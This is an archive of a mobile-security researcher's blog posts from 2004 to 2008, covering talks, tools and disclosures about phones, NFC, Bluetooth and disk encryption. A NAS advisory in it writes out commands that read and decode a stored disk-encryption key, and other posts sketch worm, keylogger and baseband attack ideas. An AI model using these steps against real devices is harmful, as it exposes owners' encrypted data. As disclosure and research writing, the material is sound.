This WAPPush auto execute configuration bug is really bad since it would allow anybody to write a very simple worm that only needs to send WAPPush messages (SMSs) to spread. The victim device than downloads and executes the worm binary from the Internet.

They even made a demo video, also you don't see too much.

Some open questions from my side:

Is it really only HTC devices?
Is it only Windows Mobile 6?
Does this work via WiFi (like my notiflood tool)?

Slientservices.de Author's website
The Advisory

Slides for Exploiting Symbian

Mon, 13 Oct 2008 13:38:00 GMT

Here are my slides for my BlackHat Japan talk Exploiting Symbian. This work was done as part of my research at Fraunhofer SIT. If you have any questions please contact me through my website at Fraunhofer SIT.

PPTP VPN for my iPhone

Wed, 10 Sep 2008 21:37:00 GMT

I just setup pptpd for my iPhone. Since I don't really trust all the application developers to think about my passwords and my privacy.

I know PPTP is not the best VPN solution but it works and was easy to setup.

@Joe du auch wolle?

Mifare ID Spoofer

Tue, 09 Sep 2008 20:24:00 GMT

Alex recently got a Mifare (RFID) ID spoofing device. Last weekend at the MRMCD111b we got to play with it. I'm looking forward to try it against some real targets.

Exploiting Symbian Talk @ BlackHat Japan

Sat, 06 Sep 2008 11:17:00 GMT

so looks like I'm going to BlackHat Japan in October to talk about my latest project SymbianOS Exploitation. I'm really looking forward to it since I never been to Japan and BlackHat before.

BlackHat Japan speakers page

Nokia 6131 NFC URI Spoofing and DoS Advisory

Sat, 16 Aug 2008 19:23:00 GMT

I finally came to post the official advisory Nokia 6131 NFC URI Spoofing and DoS Advisory to the usual mailing lists in order for this thing to get into the vulnerability archives.

Slides for BlackHat/DefCon 2008

Fri, 08 Aug 2008 10:56:00 GMT

slides for for BlackHat and DefCon 2008 are already available online.

Get them here and here

NFC Phone Tools

Mon, 26 May 2008 23:12:00 GMT

here are my NFC security tools this time for your Nokia 6131 NFC. The tool set consists out of: BtNfcAdapter (a simple NDEF reader/writer that is controllable via Bluetooth - basically turns your 6131 NFC into a lightweight tag reader/writer), BtNfcAdapterRaw (Mifare Classic raw reading version of BtNfcAdapter), and MfStt (the Mifare Sector Trailer tool, a very basic tag security checker).

All the tools are for educational purposes only! They are not stable! Especially take care when using the writing features of MfStt).

Feedback is welcome as always. I also accept dumps of cool NFC tags (only including a picture of that very tag).

Python NDEF Library

Sat, 24 May 2008 16:19:00 GMT

I just uploaded the first version of my Python NDEF library.The library supports all types standardized by the NFC-Forum until now. I also implemented support for Nokia's Bluetooth Imaging tag and added a parser for the RMV ConTag.

I also uploaded some tag samples (dumps of the tag data). The dumps also include the Mifare sector trailers (if this is of interest for you).

Feedback is very welcome!

Slides for Attacking NFC Mobile Phones

Fri, 23 May 2008 16:51:00 GMT

here are the slides for my talk Attacking NFC Mobile Phones that I gave at EUSecWest2008. The tools, libraries, examples and data dumps will be uploaded soon.

Attacking NFC Mobile Phones @EUSecWest08

Wed, 23 Apr 2008 08:50:00 GMT

looks like I've been selected to give a talk at EUSecWest this year. The subject will be the security of NFC (Near Field Communication) mobile phones.

My friend Alech also seems to have a talk there. This should be some fun.

RaidSonic NAS-4220 telnet root login without password

Tue, 18 Mar 2008 19:38:00 GMT

another bug I found in the software of the NAS-4220-B is that you can use telnet to login to the NAS-4220-B as root without being ask for as password. This is possible right after boot of the device. The problem seems to originate from the fact that the software puts together the filesystem in ram during boot. The actual bug is that telnetd is started before /etc/passwd is populated with a root account that has a password set.

[1] raidsonic nas4220 disk crypt key leak

RaidSonic NAS-4220-B Disk Crypt Key Leaking...

Sun, 16 Mar 2008 13:32:00 GMT

Found while playing with my NAS-4220-B last Sunday. RaidSonic didn't answer my emails so here you go.

--- BEGIN ADVISORY ---

Manufacturer: RaidSonic (www.raidsonic.de)
Device:       NAS-4220-B
Firmware:     2.6.0-n(2007-10-11)
Device Type:  end user grade NAS box
OS:           Linux 2.6.15
Architecture: ARM 
Designed by:  Storm Semiconductor Inc (www.storlinksemi.com)


Problem: 
 Hard disk encryption key stored in plain on unencrypted partition.


Time line:
 Found: 09. March 2008
 Reported: 09. March 2008
 Disclosed: 16. March 2008 


Summary:
 The NAS-4220-B offers disk encryption through it's web interface. The key
 used for encrypting the disk(s) is stored on a unencrypted partition.
 Therefore one can extract the encryption key by removing the disk from
 the NAS and reading the value from the unencrypted partition. The key
 itself is stored in a file in plain (base64 encoded). Therefore the 
 NAS-4220 crypt disk support can not be considered secure.


Details:
 The NAS-4220-B can hold two SATA disks. Disk are encrypted through a 
 loop back device using AES128. The problem came to my attention when
 I could access the NAS after reboot without suppling the hard disk key.
 
 The key is stored in /system/.crypt, "/system" is a small configuration 
 partition on the same disk that holds the encrypted partition. The system
 partition is created by the system software running on the NAS-4220. The
 configuration partition of the second hard disk is not mounted by default
 but also contains the .crypt file holding the key for the encrypted 
 partition on the same disk.


 Accessing the key (key value is the example I used):
  $ cat /system/.crypt
  MTIzNDU2Nzg5MDEyMzQ1Njc4OTA=
 
  key in plain           key in base64
  12345678901234567890   MTIzNDU2Nzg5MDEyMzQ1Njc4OTA=


 Base64 decode:
  #!/usr/bin/python
  from base64 import *
  print b64decode("MTIzNDU2Nzg5MDEyMzQ1Njc4OTA=")


Reported by:
 Collin Mulliner 

--- END ADVISORY ---

raidsonic_nas4220_crypt_disk_key_leak_09Mar2008.txt

Breaking Disk Encryption

Thu, 21 Feb 2008 23:43:00 GMT

Some guys from Princeton found a way to defeat disk encryption systems by extracting the key from the memory of a computer/laptop. While this is not really new (other people did that before), their way is quite cool. They remove the RAM module from the computer and read it in a other computer in order to do this without loosing the content of the RAM module they freeze the RAM module and with freeze they really mean freeze.

Check out the demo video.

Their paper explains it in all details. Read it if you use disk encryption and feel safe.

[1] Cold Boot Attacks on Encryption Keys (paper, video, faq, ...)

iPhone Baseband Exploit!

Sat, 09 Feb 2008 18:51:00 GMT

Somebody or some group seems to have found a exploitable buffer overflow in the iPhone's baseband processor. The baseband processor is the subsystem of the phone that talks to the GSM network. The overflow seems to be in the SIM Toolkit manager.

The exploit lets one upload code into the baseband, so one could insert some application into your iPhones baseband. The this application would be mostly undetectable since the memory can not be read from the application processor.

Lets see what happens with this little thing...

Source:

From: steve 
To: gsm@lists.segfault.net
Subject: [gsm] JerrySIM -> Executing shellcode on the iPhone baseband

Hi,

JerrySIM leaked yesterday. It was posted here:
http://code.google.com/p/iphone-elite/wiki/JerrySim

The exploit code has been removed shortly after but google cached it
already :/ It's out.

The program exploits a bug in the SIM Toolkit manager (which is running
on the baseband) and thus enables the execution of shellcode directly
on the baseband.

This is good work.

This has the potential to turn the iPhone into a listening device.
It still requires a lot of work and I do not know if any of the iPhone
hackers is working on it. 

regards,

steve

[1] code.google.com/p/iphone-elite/wiki/JerrySim
[2] Exploit code from Google cache

Anti DNS Rebinding patch for Dnsmasq from 0sec

Sun, 21 Oct 2007 12:25:00 GMT

here is a patch for Dnsmasq (the very popular DHCP server and DNS forwarder and cache) that will prevent DNS rebinding attacks against private networks (192.168,10.,...). The patch basically adds a filter to the forward resolver of Dnsmasq. The filter will basically drop all private IP addresses contained in answers. Of course this will not prevent a rebinding attack against other IP ranges like if your local network uses some public IP range. But since Dnsmasq is mainly used for home Cable/DSL routers (like the OpenWRT-based routers) this patch should offer sufficient protection.

dnsmasq_stopdnsrebind.patch (for dnsmasq 2.40)

To activate the DNS rebinding protection add --stop-dns-rebinding to the dnsmasq command line. I made it a command line option since dnsmasq is also used as a DNS cache on clients (e.g. Nokia N800) and you still want to be able to resolve local IP addresses.

Feedback is welcome!

Links

DNS rebinding

DNS rebinding (wikipedia)

DNS rebinding talk (by Dan Kaminsky)

Crypt Everything!

Wed, 12 Sep 2007 14:27:00 GMT

Last week I moved my last computer to full disk encryption (FDE if you need an acronym). The last computer was my desktop/laptop therefore I thought it will be slightly more work since I wanted to have suspend to disk (aka. hibernation) - it turned out to be quite easy after all (see 1).

Previously I had setup my rented root server and my home server using a small hand build system you can ssh to in order to open the root partition and continue to boot the real system (see 2).

In the recent days I did some research on possible attacks against fully crypted computer systems. Basically there is only one attack (if we rule out a brute force attack against the encryption key) this is keylogging. Keylogging basically is trying to capture all key strokes in order to obtain the passphrase for the crypted disk. Keylogging can be be done in either soft- or hard-ware both have advantages and disadvantages for both the attacker and the victim (the owner of the crypted disk).

Hardware keyloggers basically are small devices that are plugged in between the computer and the keyboard. The device then just logs all key strokes that it sees. The big advantage (for the attacker) is that this is totally OS independent. The big disadvantage for attacker of course is that he needs physical access to the victims computer twice (once to install once to retrieve the logged data). Further the victim can more or less easily find a hardware key logger if he cares to look for one. Also there are PCI-card based keyloggers (see [3]) that are probably harder to find (the computer would need to be opened). There are also keyboards with build in keyloggers (see [4]) but I doubt that these are any good since most people would recognize if their keyboard has suddenly changed. Of course you could also open up the victims keyboard and place the keylogger there, but there is always a chance that you break the keyboard while doing this. The biggest disadvantage of hardware keyloggers is that these can't monitor remote login sessions which can also be used to decrypt and boot a computer, this is where software keyloggers come into play.

Software keyloggers come in two variants, the general kernel/driver based keylogger that just monitors all keyboards and terminal devices (e.g. a remote session) and the application based keylogger where a specific application is modified so that it logs some specific or all input (e.g. the decrypt command could be modified to log the passphrase). So software keyloggers have the advantage that they can log more data (local + remote sessions) but have the big disadvantage that the attacker needs system level access to the plain not encrypted part of the computer (e.g. the boot partition) in order to place the modified kernel or binaries. If the hardware is probably secured (e.g. not booting from external disk or cdrom) the software manipulation will take really long since the hard disk would need to be removed (or at least the PC would need to be opened). Also this might not be possible at all if the victim always boots the computer from an USB stick that he carries around with him at all times. In this case there wouldn't be a plain boot partition on the PC and therefore nothing to modify. If the victim still needs to type-in the crypto password a hardware keylogger could catch him.

Laptops seem special while searching for keyloggers I only found that laptops are harder to attack since they are relatively small and therefore don't have much space to hide a hardware keylogger. The only thing I found was a Mini-PCI card based keylogger (see [5]) but since most laptops have Mini-PCI wireless cards this looks quite strange? Of course you could always disassemble the laptop to add a keylogger but this also takes a lot of time and there is always the chance to break it. The best time to do this would be if you send your laptop in for repair.

PDAs I like my Palm Tungsten T5 because it supports complete filesystem encryption. Of course this encryption is not verifiable since the source is not open but at least it is a secure algorithm (AES).

Backups don't forget to encrypt your backups. Having a fully crypted PC and plain text backup is just stupid. Good backup software should support this. Otherwise PGP/GPG your ZIPs/tarballs/whatever.

I would say that keylogging is only feasible under certain conditions: the attacker is extremely knowledgeable and the victim is some how unaware. All other cases would involve a huge portion of luck for the attacker.

[1] good starting point for crypto suspend: howto completly encrypted harddisk including suspend to encrypted disk with ubuntu
[2] small howto on: build a crypted root server
[3] PCI-based keylogger
[4] Keyboard with built in keylogger
[5] Mini-PCI keylogger
[6] USB keylogger

Marko's RexSpy Article

Sat, 01 Sep 2007 17:42:00 GMT

Marko Rogge finally published his article on RexSpy (see my comments on RexSpy). Marko and I talked a lot about RexSpy in order to determine if a bug/attack like Hafner described is possible at all.

The article is available as Blog Entry and PDF

One actually funny part of the whole story is that after I published my comments on RexSpy I got tones of emails from various people of which some seem to hope that I know how it works. So folks tried to get more information from me (I didn't have any more information). One guy even had product ideas based on this technology. Just hilarious!

Crypted Root Server

Thu, 03 May 2007 00:13:00 GMT

some time ago I setup a new root server for a new project of a friend and myself, this time I wanted to go full crypto. In the beginning I thought this might be a lot of work but as it turned out it is quite simple if you do some thinking.

There are many ways to do this, this is how I did it.

The setup works like this: the server boots into a minimal system starting only the SSH daemon. The you login and enter/upload the passphrase to unlock the disk(s). Finally you tell the system that you are done, after which you are kicked out and the system completes the boot by mouting the real root partition and executing init from there. At this point everything is as usual.

There are two basic parts in this setup: first building a good minimal system so you don't waste too much space and second build the init script for the minimal system.

The minimal system needs to contain stuff like: sshd, filesystem tools such as mkfs, fsck, fdisk, etc., cryptsetup, networking tools like ifconfig, route, ip, etc., mdadm (if you run raid), and of course all the required libraries. The easiest way to do this is using the recovery tool your hoster provides. Just setup a minimal system on one partition and strip it down before moving it to the boot partition.

The init script is quite simple, it needs to do three things: first, configure the network (ip address and route); second, start sshd; and third, start the actual system after the root partition has been unlocked. My script works as follows: after sshd has been started the script waits for a file to be created in the tmp directory. As soon as the file is created all ssh processes are killed, and the real system is booted.

Files:

file list

init script

Some notes:

Todo:

Filesystem integrity check for the minimal system. This is a very hard task and I don't have a solution so far.

Aircrack-ptw cracks WEP in 19 Seconds on my N800

Tue, 03 Apr 2007 20:57:00 GMT

I just benchmarked Aircrack-ptw on my Nokia N800 (ARMv6 320Mhz) and it finished in 19 seconds. Sadly enough the wireless packet injection doesn't work on the N800/770. 19 Seconds is quite impressive.

Breaking 104 bit WEP in less then 60 Seconds

Tue, 03 Apr 2007 19:44:00 GMT

Erik Tews with the help of two others published a new attack on WEP called: Breaking 104 bit WEP in less then 60 Seconds.

Like the older attacks on WEP this attack uses sniffed IVs in order to break/compute/crack the WEP key. The nice thing about this attack is that it only needs between 40.000 and 85.000 unique IVs (older attacks needed between 250.000 and 1.000.000 in order to succeed). This already reduces the overall attack time since one needs to capture less packages. But the attack also uses a new/other attack on RC4 which further improves the speed. The paper gives an average of 3 seconds on 1.7Ghz Pentium-M. The attack even works with 5000 keys.

Paper
Info and tool

RexSpy Slides

Fri, 16 Mar 2007 14:06:00 GMT

here are the slides on RexSpy. They say nothing at all, I just post the link for completeness.

The RexSpy Phone Trojan

Thu, 15 Mar 2007 22:23:00 GMT

since I first heard about RexSpy in late February (I know it was announced in October 2006) I wanted to know how real it is and how it works.

ultimate

infected

The German Focus (a mainstream non technical magazine) interviewed Hafner and did a trial using a SymbianOS and WinCE based phone. They claim that he could listen to calls made with both phones. Other websites like Techworld.com quote him saying that this attack also works against a Siemens C45 (which is a very simple phone with out a fancy smart phone OS).

I myself connected Hafner to find out if he is willing to release real technical information to the public about his findings, but he refused saying that he sold the RexSpy Technology and therefore no longer could publish any material. This is very bad especially because Hafner's company is selling a protection kit against mobile phone tapping. This makes you wonder if this is just a marketing thing.

Since I'm not a student anymore I don't have too much spare time on my hands so I only did some basic research. The basic operation of RexSpy as claimed by Hafner is: the trojan is install via a SMS (a Service-SMS to be precise). The trojan itself creates a kind of back channel by calling home as soon as the infected phone has an incoming or outgoing call, thereby the attacker can listen to the call. But how does this work? First idea was: a bug/feature in the GSM module or SIM card (or SIM Toolkit). A bug is kind of unlikely to be present on all platforms. A monitoring feature would be documented by someone, so this is also unlikely.

I searched a little more and found the recording of Hafner's talk at Systems, in his talk he kind of gives it away (if you know what you have too look for). He says he only implemented it for Windows Mobile (WinCE / PocketPC). That is very interesting since he first claims the RexSpy is universal across all platforms. The thing that keep me thinking is the Service-SMS which others (including myself) call binary-SMS, since I used binary-SMS for my MMS attack. Here you basically tell the device where to download a MMS message. But as far as I remember there are other binary-SMS messages (or actually WAPPush messages that are send via binary-SMS) that tell a mobile phone to go and download a WAP/WEB page. The URL could of course also point to a application binary, which could be downloaded and executed without user interaction. So maybe Hafner just found a small back door in the WAPPush handler that allows silent application installation, and writing a phone monitor tool for Windows Mobile and SymbianOS shouldn't be hard at all. For monitoring one could use the simple feature like a conference call, this way the trojan application would be very simplistic and small.

I'm still not 100% sure how it works (especially because he claims that it works with a old Siemens C45) but analyzing the Windows Mobile RexSpy Killer provided by SecurStar should bring me a step further (I haven't done this yet). I'll keep working on this and keep you updated.

I would really love to hear some comments on this.

Links:
Zone-H
Techworld (Hafner's talk at Systems in German language)
SecurStar

HID Attack Page

Sun, 31 Dec 2006 13:43:00 GMT

I just uploaded the web page I made for HID Attack. It explains how it all works. Enjoy.

HID Attack - Attack Bluetooth Keyboards

Fri, 29 Dec 2006 23:59:00 GMT

Finally I released my HID attack kit I build over a year ago, get it here. Thanks to Thierry for including it in his talk!

Story on Heise.

The Silver Bullet Security Podcast

Sun, 17 Dec 2006 13:47:00 GMT

Gary McGraw's Silver Bullet Podcast is a real nice podcast on computer security. If you are a security person check it out!

New RSG Website

Sun, 29 Oct 2006 11:35:00 GMT

The Reliable Software Group (RSG) the lab I used to work for at UCSB finally put up the new website including all my Smart Phone Security research. I also put up my Master's Thesis titled Security of Smart Phones.

I also updated my Mobile Security Research website.

Advanced Attacks Against PocketPC Phones @ 23c3

Mon, 16 Oct 2006 22:36:00 GMT

I'm going to do my 0wnd by an MMS talk at 23c3. The talk is more or less a redo from defcon-14, but I will try to fix it up a little. This will be my first talk at a Chaos Communication Congress and I'm already looking forward to it.

ACSAC paper: Vulnerability Analysis of MMS User Agents

Thu, 28 Sep 2006 23:54:00 GMT

my second scientific paper, this time at ACSAC. The topic is MMS again - actually the paper was done before DEFCON. For more infos see details for Session 2. The paper is the last one in the session.

PS: I also applied to 23c3 with the same topic aka the DEFCON talk.

Talk at Defcon 14

Sat, 17 Jun 2006 10:04:00 GMT

I'll be giving a talk at this years defcon (#14). My talk will be on Advanced Attacks Against PocketPC Phones and I will show some neat new stuff for/against PocketPC phones.

Trying greylisting

Thu, 25 May 2006 02:33:00 GMT

I've added greylisting to the list of spam countermeasures for our server project. It works surprisingly well and the amount of spam arriving at my inbox is reduced by a ratio of 20:1. While this is good there are of course downsides of greylisting such as an artificial delay for delivery of valid or good email. Also auto whitelisting should take care of regular contacts. Anyway I'm really interested in how many of our users will see the change in amount of spam vs. delivery delay, and if anyone of them will demand permanent whitelisting :-)

Paper @ DIMVA2006

Wed, 03 May 2006 21:53:00 GMT

My (with others) first scientific paper: Using Labeling to Prevent Cross-Service Attacks Against Smart Phones

MobileSecurity @ MUlliNER.ORG

Tue, 07 Mar 2006 20:04:00 GMT

just put up my mobile security research page. It will basically be a annotated link collection, since my stuff will mostly be PocketPC Security and I have a separate section for this. Feel free to send me additions and/or corrections.

BSS - Bluetooth Stack Smasher (a L2CAP fuzzer)

Tue, 07 Feb 2006 05:40:00 GMT

Pierre Betouin wrote this nice little L2CAP fuzzer based on my psm_scan (l2cap port scanner). He also already discovered bugs in several phones with it.

The tool can be found at: www.secuobs.com

nice work!

Bluetooth Spam in Berlin

Thu, 05 Jan 2006 16:13:00 GMT

mh57 just pointed me to a Spiegel Online article about Bluetooth advertising or BlueSpam as I like to call it. Its about a German company which uses Bluetooth to beef up their billboards in Berlin. Apparently they just push images, videos, text ads and coupons to any Bluetooth device in range. This is annoying but you can of course just ignore/reject the transmission or turn of visibility. The actual security/privacy problem is that people maybe get used to accept connections from certain senders e.g. BlueSpam (of course you wouldn't name your system BlueSpam). So what keeps me from standing next to one of the billboards naming my laptop BlueSpam and instead of sending a coupon I send hello.jpg. And since some phones still don't show what the Bluetooth connection is for I just pull their phonebook etc., the user will just see Allow connection from BlueSpam? Sure I want that coupon.

This is not a good idea!

Btw. the company doing this stuff is: Wall AG

UCSB iCTF '05

Mon, 12 Dec 2005 23:23:00 GMT

on Friday Dec. 09. another UCSB iCTF took place once again. As always I was just helping out (the main work is done by others Greg,Vika and Marco) writing services, placing backdoors and doing what ever is needed. Every time the event gets bigger and bigger, this time there were 22 teams with about 20 players each plus 2-5 admins for each team and about 10+ people at UCSB organizing - this is about 500 people!

In the last years teams from Italy dominated the CTF, but not this time! The winners are all German speaking #1 Aachen, #2 Vienna and #3 Darmstadt. The full scoreboard with all teams is here.

This was really fun, even for just watching the teams fighting each other :-)

Crypto USB disk with dm_crypt and FreeOTFE

Wed, 31 Aug 2005 01:09:00 GMT

I all ways wanted to go crypto for my data storage but until now I never owned any big storage device. Now I have an external 250 gig USB disk which I want to secure.

The thing with crypted disk all ways comes down to where can I read the disk? Only on my computer, only with one specific OS, etc. For me it's basically Linux and from time to time Windows. The two solutions I found where BestCrypt which is commercial (at least for Windows) and dm_crypt/FreeOTFE which is free and has much more features.

I ended up using dm_crypt/FreeOTFE.

dm_crypt is the Linux part of the crypto solution and is in part of Linux Kernel since 2.6.4. With cryptsetup its super simple to setup. You can setup a partition or a file based crypto device. The device then can be formated with whatever filesystem you want. Of course you need one which is readable by Windows (e.g. vfat/fat32).

FreeOTFE is the Windows counterpart of dm_crypt and can mount whatever you created with dm_crypt. I guess multi-disk volumes don't work but I haven't tryed it. When mounting a filesystem use mount Linux... otherwise it doesn't work :)

For the external USB disk I have two partitions, one small partition which is not encrypted - this holds the Windows drivers (FreeOTFE), the second partition is the crypto filesystem. With this you can also take your disk to a friend without downloading drivers and stuff from the net. All in all a nice solution.

MobileBugtraq

Thu, 14 Apr 2005 01:08:00 GMT

MobileBugtraq is a new bugtracking maillinglist dedicated to mobile device technology. The list is super new, so not many posts by now. I actually only saw two sofar and I couldn't find an archieve.

Anyway everybody who is into mobile and security (like myself) should check it out.

Seizure tools

Mon, 04 Apr 2005 21:17:00 GMT

while doing some web research on PDA/phone security I found this company Paraben which sells special seizure equipment for PDAs and phones. They really sell a lot of crazy stuff. I especially like the StrongHold Tent (the image on the left).

BluePrinting

Mon, 27 Dec 2004 19:25:00 GMT

today (at/for 21C3) Martin and I released our Bluetooth fingerprinting tool BluePrint.

It is a really nice and simple Perl script and just reads the output of sdptool (BlueZ). Please also check the Bluetooth Device Security Database.

Buffer Overflow

Sun, 28 Nov 2004 03:05:00 GMT

I just started learning how to write exploits utilizing buffer overflows. It is a real fun thing to do and the best part of all: it is a part of a homework for university :-) Now I know why many people write exploits it is a nice way to get around a rainy weekend day.